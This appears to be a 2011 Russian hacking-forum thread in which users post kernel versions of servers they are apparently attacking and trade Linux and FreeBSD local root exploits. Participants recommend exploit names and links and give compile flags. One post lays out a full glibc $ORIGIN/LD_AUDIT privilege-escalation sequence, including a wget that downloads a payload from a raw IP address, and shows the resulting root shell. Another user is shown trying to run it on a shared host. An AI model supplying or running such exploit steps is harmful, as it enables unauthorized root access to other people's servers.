22.08.2011, 17:06
|
|
Постоянный
Регистрация: 07.03.2011
Сообщений: 963
С нами:
7991606
Репутация:
37
|
|
Сообщение от XAMEHA
/thread229985.html
http://www.webhostingtalk.com/showthread.php?t=670497
http://www.hackforums.net/showthread.php?tid=658410
эти все пробовал нее
Expl0ited
эти тоже
а этот Ac1db1tch3z vs x86_64 Linux Kernel
вообще скомпилен не правильно под это ядро
надо так
gcc Ac1db1tch3z.c -m32 -o Ac1db1tch3z
|
|
|
22.08.2011, 19:16
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от Bramin
будьте добры, для этого есть что-нибудь?
Linux xxxxx 2.6.18-028stab070.5 #1 SMP Fri Sep 17 15:37:23 MSD 2010 x86_64 x86_64 x86_64 GNU/Linux
попробуй этот пост: #499
Сообщение от vasykas
Expl0ited
эти тоже
а этот Ac1db1tch3z vs x86_64 Linux Kernel
вообще скомпилен не правильно под это ядро
надо так
gcc Ac1db1tch3z.c -m32 -o Ac1db1tch3z
У тебя ноябрь, а роберт ю сак сентябрьский, так что даже и не знаю, что тебе посоветовать.
|
|
|
|
22.08.2011, 23:34
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
есть сервер FreeBSD 7.3, но gcc нет - сплойт не запустить? А если скомпилированный бинарник запустить, то будет работать?
|
|
|
|
23.08.2011, 00:23
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от vasykas
есть что нибудь
Linux icpu1521 2.6.28.8-20101130b-iscsi-ntacker-fasync-mremap-amd-sec6-grsec #1 SMP Tue Nov 30 18:27:29 CET 2010 i686 GNU/Linux
Тут же установлен grsec, т.ч. про айсидбитчез и возможно другие сплоеты забудь.
Скинь ls -la /lib/libc*; ls -la /lib/libpc*
Возможно Glibc возьмет (сам не проверял возможность эксплуатации Glibc с установленным grsec, но вроде на эксплуатацию уязвимости с Glibc он повлиять не должен, но повторюсь, я не уверен в этом).
Сообщение от vasykas
Linux ********** 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
А вот под это попробуй:
http://www.exploit-db.com/exploits/15704/
http://www.exploit-db.com/exploits/15944/
http://www.exploit-db.com/exploits/15916/
Два последних сплоита я сам не тестил, ну и конечно же проверь можно ли взять Glibc'ом.
Сообщение от попугай
есть сервер FreeBSD 7.3, но gcc нет - сплойт не запустить? А если скомпилированный бинарник запустить, то будет работать?
Ты троллишь чтоле? =)
gcc только для компиляции, смело запускай из директории которая не под noexec
Кстати под FreeBSD 7.3 советую вот это:
https://rdot.org/forum/showthread.php?t=601
Проверенный сплоит ) Ну это смотря какого года у тебя сборка...
|
|
|
|
23.08.2011, 00:43
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Tigger
Ты троллишь чтоле? =)
gcc только для компиляции, смело запускай из директории которая не под noexec
Кстати под FreeBSD 7.3 советую вот это:
https://rdot.org/forum/showthread.php?t=601
Проверенный сплоит ) Ну это смотря какого года у тебя сборка...
Я имею ввиду, что если gcc нет на сервере, то не скомпилировать сплойт.
За сплойт спасибо. Сборка 2010 года.
У кого-нибудь есть уже скомпилированный бинарник или скомпилируйте, пожалуйста, этот сплойт https://rdot.org/forum/showthread.php?t=601
P.S. Сплойты под фряху на лине можно компилить?
|
|
|
|
23.08.2011, 01:08
|
|
Постоянный
Регистрация: 07.03.2011
Сообщений: 963
С нами:
7991606
Репутация:
37
|
|
Linux icpu1521 2.6.28.8-20101130b
-rwxr-xr-x 1 root root 1147548 Jan 21 2010 /lib/libc-2.3.6.so
lrwxrwxrwx 1 root root 13 Sep 15 2010 /lib/libc.so.6 -> libc-2.3.6.so
lrwxrwxrwx 1 root root 14 Sep 15 2010 /lib/libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 11024 Apr 14 2004 /lib/libcap.so.1.10
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 10644 Sep 5 2006 /lib/libcfont.so.0.0.0
-rw-r--r-- 1 root root 181684 Jan 21 2010 /lib/libcidn-2.3.6.so
lrwxrwxrwx 1 root root 16 Sep 15 2010 /lib/libcidn.so.1 -> libcidn-2.3.6.so
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 5820 Dec 6 2007 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 Sep 15 2010 /lib/libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 73540 Sep 5 2006 /lib/libconsole.so.0.0.0
-rw-r--r-- 1 root root 21868 Jan 21 2010 /lib/libcrypt-2.3.6.so
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcrypt.so.1 -> libcrypt-2.3.6.so
lrwxrwxrwx 1 root root 19 Sep 15 2010 /lib/libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 18380 Sep 5 2006 /lib/libctutils.so.0.0.0
-rw-r--r-- 1 root root 5400 Jan 21 2010 /lib/libpcprofile.so
|
|
|
|
23.08.2011, 01:11
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от vasykas
Linux icpu1521 2.6.28.8-20101130b
-rwxr-xr-x 1 root root 1147548 Jan 21 2010 /lib/libc-2.3.6.so
lrwxrwxrwx 1 root root 13 Sep 15 2010 /lib/libc.so.6 -> libc-2.3.6.so
lrwxrwxrwx 1 root root 14 Sep 15 2010 /lib/libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 11024 Apr 14 2004 /lib/libcap.so.1.10
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 10644 Sep 5 2006 /lib/libcfont.so.0.0.0
-rw-r--r-- 1 root root 181684 Jan 21 2010 /lib/libcidn-2.3.6.so
lrwxrwxrwx 1 root root 16 Sep 15 2010 /lib/libcidn.so.1 -> libcidn-2.3.6.so
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 5820 Dec 6 2007 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 Sep 15 2010 /lib/libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 73540 Sep 5 2006 /lib/libconsole.so.0.0.0
-rw-r--r-- 1 root root 21868 Jan 21 2010 /lib/libcrypt-2.3.6.so
lrwxrwxrwx 1 root root 17 Sep 15 2010 /lib/libcrypt.so.1 -> libcrypt-2.3.6.so
lrwxrwxrwx 1 root root 19 Sep 15 2010 /lib/libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 18380 Sep 5 2006 /lib/libctutils.so.0.0.0
-rw-r--r-- 1 root root 5400 Jan 21 2010 /lib/libpcprofile.so
Сделай df -h и если дира /tmp не смонтирована в другом разделе, то всё ок можешь приступать к:
Код:
$ mkdir /tmp/exploit
$ ln /bin/ping /tmp/exploit/target
$ exec 3 /tmp/exploit/target*
$ rm -rf /tmp/exploit/
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
$ wget -O /tmp/payload.c http://194.105.208.43/payload.c
$ gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)
(c) http://www.opennet.ru/opennews/art.shtml?num=28338
Если не выйдет, то что же, заюзай: http://blog.nibbles.fr/2230
|
|
|
|
23.08.2011, 01:25
|
|
Постоянный
Регистрация: 07.03.2011
Сообщений: 963
С нами:
7991606
Репутация:
37
|
|
Сообщение от Expl0ited
Сделай df -h и если дира /tmp не смонтирована в другом разделе, то всё ок можешь приступать к:
df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda7 3.7G 1.5G 2.1G 41% /
/dev/sdb 933G 588G 346G 64% /homepages
что это дает
|
|
|
|
23.08.2011, 01:27
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от vasykas
df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda7 3.7G 1.5G 2.1G 41% /
/dev/sdb 933G 588G 346G 64% /homepages
что это дает
Всё нормально, пробуй.
|
|
|
|
23.08.2011, 01:30
|
|
Постоянный
Регистрация: 07.03.2011
Сообщений: 963
С нами:
7991606
Репутация:
37
|
|
Сообщение от Expl0ited
Всё нормально, пробуй.
в tmp каталог exploit создался но при вводе
ln /bin/ping /tmp/exploit/target
ln: creating hard link `/tmp/exploit/target' to `/bin/ping': Invalid cross-device link
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
